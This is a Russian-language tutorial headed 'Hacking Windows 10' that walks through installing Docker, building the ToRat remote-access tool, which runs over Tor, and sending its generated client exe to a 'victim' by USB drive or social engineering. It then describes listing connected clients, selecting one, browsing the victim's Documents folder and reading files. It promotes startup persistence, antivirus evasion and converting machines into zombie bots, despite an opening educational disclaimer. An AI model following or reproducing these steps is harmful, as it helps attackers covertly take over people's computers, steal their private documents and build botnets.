Взлом Windows 10
Данный материал предоставлен лишь в образовательных целях и создан в рамках изучения информационной безопасности. Автор не публиковал материал для вредоносных целей. Если кто-либо воспользуется информацией для личной выгоды, то автор не несёт ответственность за любой причинённый вред или ущерб.
Описание
ToRat- инструмент удалённого администрирования. Используя этот инструмент, мы можем взломать компьютер жертвы, если у него нет какой-либо защиты от вирусов на его компьютере. ToRat полностью построен на языке Go с использованием транспортной машины TOR. Согласно этическому исследователю хакерских атак, он может обойти АВ-защиту.
Установка
Перед установкой инструмента мы должны установить docker-engine.
Установка докера
Наберите эту команду для обновления пакетов:
sudo apt-get update
Затем используйте эти команду для установки пакетов:
sudo apt-get install \ apt-transport-https \ ca-certificates \ curl \ gnupg-agent \ software-properties-common
Теперь введите эту команду в терминале, чтобы добавить официальный ключ GPG в Docker:
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add –
Теперь мы должны проверить ключ с помощью отпечатка пальца, который у нас есть 9DC8 5822 9FC7 DD38 854A E2D8 8D81 803C 0EBF CD88 путём поиска по последним 8 символам отпечатка пальца.
sudo apt-key fingerprint 0EBFCD88
Далее, введите эту команду для настройки стабильного хранилища:
sudo add-apt-repository \
Теперь используйте эту команду для установки последней версии Docker-Engine:
sudo apt-get install docker-ce docker-ce-cli containerd.io
Теперь, проверьте сообщество движка докеров с помощью этой команды:
sudo docker run hello-worldУстановка ToRat
Установка ToRat
Наберите в терминале эту команду для клонирования инструмента:
git clone https://github.com/lu4p/ToRat.git
Наберите команду cd для входа в каталог:
cd ToRat/
Введите эту команду для создания Docker-контейнера ToRat:
sudo docker build . -t toratИсполнения инструмента
Затем введите эту команду в терминале для запуска контейнера:
sudo docker run -it -v “$(pwd)”/dist:/dist_ext torat
Использование
Чтобы найти параметры введите команду help
Основной шаг инструмента - получить доступ к компьютеру жертвы, отправив exe файл.
Мы находим файл .exe по этому пути:
/home/iicybersecurity/ToRat/dist/dist/client# ls
Загрузите файл client-windows-4.0-amd64.exe и отправьте этот файл жертве через Pendrive или некоторые методы социальной инженерии.
Используйте команду list, чтобы проверить, подключён ли клиент к серверу.
Теперь используйте команду select и номер из списка клиентов для доступа к машине жертвы.
Теперь давайте попробуем открыть любой документ, содержащий конфиденциальную информацию на компьютере жертвы.
Введите команду dir, чтобы проверить каталоги на компьютерах жертв.
Здесь мы нашли каталог с названием Documents.
Теперь давайте войдём в папку «Documents» с помощью команды cd Documents и проверим информацию жертвы
Также мы можем просматривать документы просто вводя имя файла с помощью команды type.
Основным преимуществом использования этого инструмента является то, что мы можем получить доступ к компьютеру жертвы в любое время при перезагрузке, запустив процесс backdoor при запуске. Таким образом, в процессе цифровой криминалистики, процессы BOT также идентифицированы.
ToRat работает через сеть TOR для доступа к ботам. В этом инструменте, отправив один exe файл жертве, обычная система может быть преобразована в BOT для работы в режиме зомби.